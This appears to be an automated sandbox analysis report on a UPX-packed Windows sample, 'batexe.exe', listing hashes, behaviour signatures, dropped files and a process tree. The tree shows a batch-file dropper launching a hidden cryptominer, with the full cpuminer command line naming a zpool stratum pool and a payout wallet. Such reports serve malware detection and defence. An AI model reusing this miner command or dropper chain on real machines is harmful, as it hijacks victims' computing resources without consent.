73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
307s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 04:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3232	b2e.exe
3552	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3552	cpuminer-sse2.exe
3552	cpuminer-sse2.exe
3552	cpuminer-sse2.exe
3552	cpuminer-sse2.exe
3552	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3240-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3240 wrote to memory of 3232	3240	batexe.exe	73
PID 3240 wrote to memory of 3232	3240	batexe.exe	73
PID 3240 wrote to memory of 3232	3240	batexe.exe	73
PID 3232 wrote to memory of 192	3232	b2e.exe	74
PID 3232 wrote to memory of 192	3232	b2e.exe	74
PID 3232 wrote to memory of 192	3232	b2e.exe	74
PID 192 wrote to memory of 3552	192	cmd.exe	77
PID 192 wrote to memory of 3552	192	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3240
- C:\Users\Admin\AppData\Local\Temp\1EDD.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1EDD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1EDD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2546.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:192
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1EDD.tmp\b2e.exe

Filesize
2.2MB

MD5
f2ef6f9b758468ee58944440b026242c

SHA1
3d17241739a5cac9dcf32b9d815b0b599c9ca2a6

SHA256
1432a84aa00feddf0fcf628d7e3e4299e01ad79b952ec693fa475c21a5a7e565

SHA512
17c9ddba85da6f8f0ca7002236aa41e780e9ea9771c3e571c43186a0f4246ad090d1defb0c8bf69f8666bbed1c95572e32d16ebc7cffbdc25136914b94b34989

Download Submit
C:\Users\Admin\AppData\Local\Temp\1EDD.tmp\b2e.exe

Filesize
3.5MB

MD5
4750387baf9b110a4b372d47664bd0e0

SHA1
fe66cea81fe27e31bb3363a2e4a179e32fdfb196

SHA256
ccc6a162f724e4eafddf05f0614afe63c35406de9f7b5ead89dde1b61c53951a

SHA512
68b277b0dd929249de9319b46434894bb2c855bf0d0cad8743889e5cedbecb3884cfc78f692fe54501fc4d6e82f45e4fe63b450d914e204eeb2551ee7418a0be

Download Submit
C:\Users\Admin\AppData\Local\Temp\2546.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
143KB

MD5
ea19e8af49b5eef3d092c57ec882be0e

SHA1
f0c024e530c79539f575e788ac4316f9ab10340e

SHA256
e34e428be1184d19048266f862466c87489595630fd07b53bfec9c87b961a30d

SHA512
75ce65bc3a437ab3656d341837a335b6c81793ee62c195c51a7929bdf9a8ce8950852460012773a2b2f68390a73daa7645d74fd1f58fe64f65e21cdc13c20cbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
255KB

MD5
fd9f977f3ab0a696b9a4adbe37028135

SHA1
b2626784138f96734e95b9233a0ebbbb9dea3d2b

SHA256
5b73e3a1f3f70ff816d5ac9b5456fcb53199344ea1c195aeb9ac0b19446c7e27

SHA512
a55c747d80842aeff7d3fafbb61e7ba8966f1bee25b63fb9431a99d7b5e32a2648112626fc8a5304a620a7d02c83d3e1e5ca2fd01eff2d18caae87b404718f24

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
82KB

MD5
cff56c5c36b1b8de3120b46883525616

SHA1
79cf0f52db0086c87e86062f936ca1ef2005ac3d

SHA256
2e21ff36f56b471bda0096848a52d2e06d97a98772a2fcfe56bc5058c933e118

SHA512
878c797989fbe586277b76b4128c0477773d7b89bbfd0c4780d8bb6c44df2d8cc68430beefa2376e4ad7ff6fbd5ecf4d41119c772c40f582c0dc6c7228bdb5b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
202KB

MD5
e7842a7e3466bd47aa13bf8636b7aa95

SHA1
4d3ee5f9a480ab031e6cd4a4dd8a87a83a0ff38a

SHA256
0bebeb870868cf278d1f5b79f5eebb99540039bff2f0929eafca942374c57543

SHA512
65f2267703905da83d74594e5c4c9cd69f684057bcb7eef6e50d422e473049ea348e12c88163657765cfb8872138e27913dff4ce0b4331648ccdf4dca00d8df8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
90KB

MD5
dfb39d5ef9744e60b5d6b6d85db7e69e

SHA1
adf27e0d8dd1c0c992867b5cc25f838c83e391fb

SHA256
dc399a452f49595b117099824a57aae39f6553491c62e60ebaf23f573c085749

SHA512
fc6c9fb970fd936870de2ba7a034622e82d5aae8001d7c17e0fac347c81fb4a8c2796df5fe8ae685608b2e8c8feb98d60652684b87335c92a9b06501077b155d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
125KB

MD5
f5d3031c3a2fa03c83d0a779076f6756

SHA1
996475a2b63eba39474571b9a59a61719c1ca396

SHA256
58f0f43a85e4d6ff7f959e337add644e520d7f7ea6063eb8d43992a9108c53bb

SHA512
ea7afadbcbe95a45897b6aa889d8a2b843cb201f1e2db74868703e7032bde474178f331b33a538d1d899cc4e4ed7965b18b1239a253eb1ec1e4db48c8be0eee5

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
93KB

MD5
ced46a07b30c1e5c9a2167d5cda4950a

SHA1
91580aed9ac6c3c45c323bb0ac02c66dd7c1ea7f

SHA256
a8d8ed993f7ada3a7683da0aaae688190a5e808ffa096cd6f90badd0bf46c88c

SHA512
2ea6caafdb0b79fe7a2952e21076fea166e6e3b38d9a5bffd3f43185893d4fd8ad8dfd328be8a769aa165af3b2b72995fdb44205cb90e7c8fee9a5964d757b32

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
198KB

MD5
2f6bd0a303a10a47b74d17e034777ca0

SHA1
990cdda89c663f398c48ce9a0494e699f0c22dca

SHA256
cdc7da7106475ca91480f2a323054acffce532d7d12ce2146bdcc17ecf0e9b4a

SHA512
1d2cc7b7d18e6a7fd0e059bc7ee0c41124cbc7bdc451a6929202e6ecaa58b9e93fca6396b6e7038e40eb403cf4c526328dd7deaba30d2515ee3602069a4d4185

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
217KB

MD5
db683e012b49206aa0fdc1b7a5309624

SHA1
ada1a8f44c764a1c3f672613116d0532ae3050c9

SHA256
a76144fdc4135e522b21d41780f13cf2f8f1123056dd03acbe28fc8f1edcd381

SHA512
08840a95b7e6c45a0d3ba17fbe66e60c40713cd242b9af89811d8cf60b4770ac05d7e4a66c09be410ee90bfdd2ffea372b55dc40a43abd222df2f3e37094e303

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
74KB

MD5
184f739b7a43b807d3354d591bd365c3

SHA1
da2024f653ab9f4d7c0b6bdb86852d3c63af4556

SHA256
582e072853e76a5d94966d5b52a02b4b195079b06a16a8b7ea663ac1b78b8021

SHA512
a22ffaede77396c7f469d4e7d4ceda9937daedb9a0618ce86d1e9fd8573805f91d78a161f40ad1639271b26b2f7e569ed1525079ba2361c8efbb77c69f10b875

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
165KB

MD5
169ee5978be7cb214319f99ae3290c24

SHA1
89b57c91bff6d997df534260e93484a51a62eeb6

SHA256
bcfcdc9e1baf69da14e814af514a61c9591e8112c108513697eca91fe15ff5d5

SHA512
f75a659434c3fa3dbe0de4e36c36d06aef68e6a132f52c5611af996d11c848cdb2c5c344d5b1ac4c54fae33f946a0329da40f004a4873dd1bc60c20313c788e4

Download Submit
memory/3232-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3232-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3240-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3552-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3552-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3552-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-44-0x0000000001070000-0x0000000002925000-memory.dmp

Filesize
24.7MB

Download
memory/3552-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-43-0x00000000505A0000-0x0000000050638000-memory.dmp

Filesize
608KB

Download
memory/3552-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download